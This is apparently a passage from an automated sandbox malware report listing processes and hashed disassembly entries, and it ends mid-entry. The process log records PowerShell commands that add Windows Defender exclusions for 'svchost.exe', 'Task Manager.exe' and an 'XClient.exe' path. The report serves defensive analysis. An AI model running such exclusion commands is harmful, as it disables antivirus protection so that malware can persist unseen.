                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:15:07:49
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:15:07:49
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:21
                                                                        Start time:15:07:54
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:15:07:54
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:23
                                                                        Start time:15:08:31
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:24
                                                                        Start time:15:08:31
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FFD347A10ED Relevance: .4, Instructions: 428COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a14c9b78eada10f9dfc10d2138326c13cdfb46d9cd86c25a22fce6b679050d55
                                                                          • Instruction ID: 496f69640c38f9a1ea8a208e81e9cfb7b835843e2e429e6ea25c9e748fe80a75
                                                                          • Opcode Fuzzy Hash: a14c9b78eada10f9dfc10d2138326c13cdfb46d9cd86c25a22fce6b679050d55
                                                                          • Instruction Fuzzy Hash: 7C31EB61B0DAC84FE795AB688CA92B87BE1EF9A305F0400BBD44DC32D3DD186C05C351
                                                                          Function 00007FFD347A09F7 Relevance: .2, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01770bd6a80d893fbd29c7c6a677d7ee39db63d59a8058a407f52a0878d4a13d
                                                                          • Instruction ID: c1bd3d3cb1620343ea38415e27bac6c3e3c8489ae1a433b3cfbdf80771b90c30
                                                                          • Opcode Fuzzy Hash: 01770bd6a80d893fbd29c7c6a677d7ee39db63d59a8058a407f52a0878d4a13d
                                                                          • Instruction Fuzzy Hash: 06718D70A199498FEB98EF68C4A8BAD77E2FF49314F104568D11AD32D1CF38AC45DB80
                                                                          Function 00007FFD347A0D80 Relevance: .1, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 281ae84fd20f1d6260a4a3db5699aeb6a3cb5e8d69f4d2205c968c3ca009bf98
                                                                          • Instruction ID: 626a13c734f6b189acc9a3f20b00be2823847407cadaba37c17e735c529bfa0d
                                                                          • Opcode Fuzzy Hash: 281ae84fd20f1d6260a4a3db5699aeb6a3cb5e8d69f4d2205c968c3ca009bf98
                                                                          • Instruction Fuzzy Hash: 2831986288E3C25FC3439B709CB64A17FB09E4722070E44DBD4C4CB5E3D51C6A9AD762
                                                                          Function 00007FFD347A0498 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26539a65bf915f402bad213380b4361f3759dfcfe32152d2beecd49d27a61622
                                                                          • Instruction ID: d30dfe0ee1e00f948fd809c1e694b8f075ce48e4d7ff58a741ae7407f0f9d631
                                                                          • Opcode Fuzzy Hash: 26539a65bf915f402bad213380b4361f3759dfcfe32152d2beecd49d27a61622
                                                                          • Instruction Fuzzy Hash: 1E21B671B18D4D8FFB94FB6C88A96B977D2EF99301B44047AE40EC32A3DD64AC418740
                                                                          Function 00007FFD347A0951 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76fde47e6c3be31679e755bbd9167039a7e5ee2ea745e0bc00ba74bedfa1f4cf
                                                                          • Instruction ID: c57f1f5199275823c9bad84e31dbc93f04c6cf48ec2c14e3704cd2c486505ccc
                                                                          • Opcode Fuzzy Hash: 76fde47e6c3be31679e755bbd9167039a7e5ee2ea745e0bc00ba74bedfa1f4cf
                                                                          • Instruction Fuzzy Hash: 0011CEB1D057498FEB44CFA8C4992EDBBB1FF58320F11412AD544E7392DB79A9468B80
                                                                          Function 00007FFD347A0E71 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 456ef291cce19e2caf13b2c139915950066af676fe94f465f3c45939cdaaa31e
                                                                          • Instruction ID: 4bb8482404c53d97374cfa63eee14fe2a83015e07067b6d4ff750401abd727fc
                                                                          • Opcode Fuzzy Hash: 456ef291cce19e2caf13b2c139915950066af676fe94f465f3c45939cdaaa31e
                                                                          • Instruction Fuzzy Hash: E001F93071D68A8FD794EB7894A15A973D1FF8D210B100579C649C3382DE2CB88297C1
                                                                          Function 00007FFD347A04A8 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aefb5c7f704dc4b148cae2f1f381604205a668762794ef17855855a65acce68c
                                                                          • Instruction ID: be009adfd98e2f46a74581c801e766ff0a6d1361010c95be9479e07acd39373c
                                                                          • Opcode Fuzzy Hash: aefb5c7f704dc4b148cae2f1f381604205a668762794ef17855855a65acce68c
                                                                          • Instruction Fuzzy Hash: F0F02830B1D59A8BD7A4BB7C94A15BA73C5EF8D304B100935D60EC3381CD2CB84197C0
                                                                          Function 00007FFD347A04B0 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 834c42c6bbed6e0228aeafb1f726956798122f1318f167e17532253a6542c684
                                                                          • Instruction ID: bb2ab91635793ef2596a58743305681869235aa4b115e53e1bb8861831041aa5
                                                                          • Opcode Fuzzy Hash: 834c42c6bbed6e0228aeafb1f726956798122f1318f167e17532253a6542c684
                                                                          • Instruction Fuzzy Hash: EBF0F43071D95A8BD794BB3C94A167A73D1EB8D300B500939D50EC3380DE2CB84297C1
                                                                          Function 00007FFD347A0F3F Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2133239094.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd347a0000_dLRcE11Dkl.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c381fed9d620d1140212ab6bffff51d38da8edd2e4d0c00bc1627235c312309
                                                                          • Instruction ID: c8edc9aeb064f42f25db8968498196943f3909cb829101f5ec3cd6e3d8b0dd8c
                                                                          • Opcode Fuzzy Hash: 7c381fed9d620d1140212ab6bffff51d38da8edd2e4d0c00bc1627235c312309
                                                                          • Instruction Fuzzy Hash: BCE08642B1994D4BEB9479AC28A62F8B3C6DB99310F410535E10DC2387DC1D6C825281

                                                                          Executed Functions

                                                                          Function 00007FFD34770D80 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H
                                                                          • API String ID: 0-2852464175
                                                                          • Opcode ID: 6a06bde783d8693347ae809a49c3d8afd4a657417926d770ee9b30de54df9fef
                                                                          • Instruction ID: fd4990d4b462f7c10fa904fc3b1009496e40bcb21ae05b81d725059ae6a1a270
                                                                          • Opcode Fuzzy Hash: 6a06bde783d8693347ae809a49c3d8afd4a657417926d770ee9b30de54df9fef
                                                                          • Instruction Fuzzy Hash: 5D319AA284E3C25FC7435B705CB64A17FB09E4722074E84DBD4C4CB4E3D54C699AD762
                                                                          Function 00007FFD347710ED Relevance: .4, Instructions: 429COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d3710be856ad4e11d015d93e35ad2ceb42097f6e358cd5b8289cc3ac1ade128
                                                                          • Instruction ID: 5fbb9ad104d28a9d5a6923a9acc7ec281e15d5fca94a4f4ead0b3c3e27a4ed03
                                                                          • Opcode Fuzzy Hash: 8d3710be856ad4e11d015d93e35ad2ceb42097f6e358cd5b8289cc3ac1ade128
                                                                          • Instruction Fuzzy Hash: 4D31EB61B0DA894FE795E7688C692B87BE1EF96305F4500BBD44DC32D3DD58AC05C351
                                                                          Function 00007FFD347709F7 Relevance: .2, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da56ba5f3312977bccf4354824f88eec9841f44900e3a205d3f466368bae4730
                                                                          • Instruction ID: d4784fb23f1f122b4592e07a051462e0e522ae264ff2305ba6c06b857254f714
                                                                          • Opcode Fuzzy Hash: da56ba5f3312977bccf4354824f88eec9841f44900e3a205d3f466368bae4730
                                                                          • Instruction Fuzzy Hash: 1E718170A199498FEB98EB68C8A8BAD7BE2FF55314F504179D01AD32D1CF78AC41D740
                                                                          Function 00007FFD34770498 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6bcf263bfd787617640e6db6bab9f5b8340e15f1bef89e152c301cac29c29a29
                                                                          • Instruction ID: f4fb8015a40d4d2762abb7e52370cf22dfe62e5b87b6ebce25ecf1aa63cedb94
                                                                          • Opcode Fuzzy Hash: 6bcf263bfd787617640e6db6bab9f5b8340e15f1bef89e152c301cac29c29a29
                                                                          • Instruction Fuzzy Hash: D721A431B1494D8FEB94FB6C88A96B977D2EF99301B44007AE40DC3293DD68A8418740
                                                                          Function 00007FFD34770EF9 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2be85cb0317ab4280ace78e2fb50f7dcba50a95a99c7c2a3a6cc2db80bb8b51
                                                                          • Instruction ID: 3c90bec5293d78c19e83c4a8e8f844478dcadd5fa3cf1e46a3bdaaa862e10637
                                                                          • Opcode Fuzzy Hash: d2be85cb0317ab4280ace78e2fb50f7dcba50a95a99c7c2a3a6cc2db80bb8b51
                                                                          • Instruction Fuzzy Hash: B201E192B0D9C64FE364ABB80CBA5B47F91EF9A210B4981B9E149C21D3DC1DA8429290
                                                                          Function 00007FFD34770951 Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a04ed53cc2f44f04fc4ad040377381f4b06f15f6b57421b5bc2caba7ceb09ed
                                                                          • Instruction ID: b64edad9343d085d8ef1d55f89c6576dde1ce513c5d21910d46bab8003534597
                                                                          • Opcode Fuzzy Hash: 8a04ed53cc2f44f04fc4ad040377381f4b06f15f6b57421b5bc2caba7ceb09ed
                                                                          • Instruction Fuzzy Hash: 4D1102B1D057888FEB44CF68C8992EDBBF0FF59310F50816AD444E7282DB78A946CB81
                                                                          Function 00007FFD34770E71 Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d143115e47306da724dcfb6b48670fa228ceaea33da12bd41560053867acf39c
                                                                          • Instruction ID: 4b6b259351f30ff14e4b4c674f8efd190241af73b2074ddffadb409e245b32ba
                                                                          • Opcode Fuzzy Hash: d143115e47306da724dcfb6b48670fa228ceaea33da12bd41560053867acf39c
                                                                          • Instruction Fuzzy Hash: 33012630B1DA8A4FD794EB3888A15B973E1FF89200B80157AC549C3282DE6CF88287C1
                                                                          Function 00007FFD347704A8 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b95195874b47bc925ad6b0e9b12afae00830b64928229279b914a8f25e05e4c0
                                                                          • Instruction ID: 93aee327fc64f4235cf9f7d0e1681202f22d72f315819a82d0105bf68f398e12
                                                                          • Opcode Fuzzy Hash: b95195874b47bc925ad6b0e9b12afae00830b64928229279b914a8f25e05e4c0
                                                                          • Instruction Fuzzy Hash: 9BF02820B2D55A4BE764F63C98A15BA73D5EF89304B900536D50EC3382CD6CF88187C1
                                                                          Function 00007FFD347704B0 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4330319ce3d0b232e5b15f4878a981b742d5744f0bb3343c1164e1fad8ccd43e
                                                                          • Instruction ID: 704ea2e64526d44e0dd83f1dcfd3a0a0ddbb97ae39e8be6a4cb244889a38bc02
                                                                          • Opcode Fuzzy Hash: 4330319ce3d0b232e5b15f4878a981b742d5744f0bb3343c1164e1fad8ccd43e
                                                                          • Instruction Fuzzy Hash: 8FF0A43072895A4BDB58F73898A567973D5EF89700B90053AD54EC3381DE6CF88287C5
                                                                          Function 00007FFD34770F3F Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2134330419.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34770000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ae21a2af92d76fec733bf0b818e3ebfb3cf5f4b35a83102eb820c3a25e98083
                                                                          • Instruction ID: c361a67fdf8b159f4d2e0bc1e834e19c478c3d417c0dca13abffb3feaf574314
                                                                          • Opcode Fuzzy Hash: 7ae21a2af92d76fec733bf0b818e3ebfb3cf5f4b35a83102eb820c3a25e98083
                                                                          • Instruction Fuzzy Hash: 0FE08642B58D4D4BE7A875AC28B62B8B7C2DB99214F818135E10DC22C7DC5DAC825280

                                                                          Executed Functions

                                                                          Function 00007FFD34780A21 Relevance: .4, Instructions: 413COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce47468bc0b05fd27b54e8433a42870fe14d7404e9b98dc62c69e26dbe4536a0
                                                                          • Instruction ID: b0197c7d4435686494d92152b1b45620db88918a2bf1e33eaa7adee2c0b10d65
                                                                          • Opcode Fuzzy Hash: ce47468bc0b05fd27b54e8433a42870fe14d7404e9b98dc62c69e26dbe4536a0
                                                                          • Instruction Fuzzy Hash: 72D1C770B18A4D8FDB98EF68C4A56B973E2FF55312B510639D51ED32D2CE38AC119780
                                                                          Function 00007FFD347812D2 Relevance: .6, Instructions: 599COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3aa0224292af7b49d4cb98f55884ace590a7ce7ad97dd2e3d3ed8cd1cd968638
                                                                          • Instruction ID: ab34217226e61a858712c3052e7fbd5074a53737554a2ec1604f3575b8bdd194
                                                                          • Opcode Fuzzy Hash: 3aa0224292af7b49d4cb98f55884ace590a7ce7ad97dd2e3d3ed8cd1cd968638
                                                                          • Instruction Fuzzy Hash: 0CB1C6B1B1CA498FE794DB6C48AA3A9B7D1FF99311F4801BAD44DD32D3DD28AC418391
                                                                          Function 00007FFD34780578 Relevance: .4, Instructions: 416COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 282d42e48419d84dd7c283cda6ea41ae5669de23a8efadde165484393f333e6a
                                                                          • Instruction ID: 48f2842b091e2bfd49c8f15a7279fbd0623c2ec77584010307b170eae0a333f2
                                                                          • Opcode Fuzzy Hash: 282d42e48419d84dd7c283cda6ea41ae5669de23a8efadde165484393f333e6a
                                                                          • Instruction Fuzzy Hash: 8F017C70A0E7C18EF79663B408B62A93F609F43215F4A00FED589CB1E3CD5E78559392
                                                                          Function 00007FFD347804A8 Relevance: .3, Instructions: 333COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69fb832b903b4429658863ad84f50f34cf1c855d2a71df9a746b751178c65b87
                                                                          • Instruction ID: 0df055960448ff0ed7c083462e90d1bbdb821d37d9b90f7517970c4953c9479d
                                                                          • Opcode Fuzzy Hash: 69fb832b903b4429658863ad84f50f34cf1c855d2a71df9a746b751178c65b87
                                                                          • Instruction Fuzzy Hash: 6DA1C6B1B18E498FE798DB6C84AA3B9B7D2FF99311F440179D44DD3292DE38AC418391
                                                                          Function 00007FFD3478109E Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7389fe1ff23febca7981169843d89503c43e591dd8a55982bd952a9fca04fd8
                                                                          • Instruction ID: ffcf65905a1f5aba800de2ea314df8f17ad154c32f476a6dd10cf29ed966ac4d
                                                                          • Opcode Fuzzy Hash: d7389fe1ff23febca7981169843d89503c43e591dd8a55982bd952a9fca04fd8
                                                                          • Instruction Fuzzy Hash: ADE09B53B49D4D0BE7E4A59C78A63B863C2DBDD231B414636D10DC7387EC195C834380
                                                                          Function 00007FFD347809E6 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2174996485.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffd34780000_All function.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f39cc6e8099372b735dce298c7e3edc0e4beb74bc69553066323d86f5732f38e
                                                                          • Instruction ID: d07581bf74f04334f912620cddfd4e627d6e601d2f0debb7232bcc293e6587aa
                                                                          • Opcode Fuzzy Hash: f39cc6e8099372b735dce298c7e3edc0e4beb74bc69553066323d86f5732f38e
                                                                          • Instruction Fuzzy Hash: 21E0CD20B18D1507D784F9189471D7D73C1DB84354B850464F40CD3391CD1CAA8243C1

                                                                          Executed Functions

                                                                          Function 00007FFD34769EF3 Relevance: .3, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2570274190.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e57f2b46e0c40ac97d10d8633b6212b3d56c76b015ab79b3158d4c5e54947ddc
                                                                          • Instruction ID: d32fd4356cffdc33e7a7c37f1a3b43ae5d996219c39b7f19082499ee7088be3c
                                                                          • Opcode Fuzzy Hash: e57f2b46e0c40ac97d10d8633b6212b3d56c76b015ab79b3158d4c5e54947ddc
                                                                          • Instruction Fuzzy Hash: 69712EA7B0DA869BE711972C98F70E93794EF53339B0901B3C688CE053FD1C28679691
                                                                          Function 00007FFD3464E620 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2566969148.00007FFD3464D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3464D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd3464d000_powershell.jbxd
                                                                          Similarity
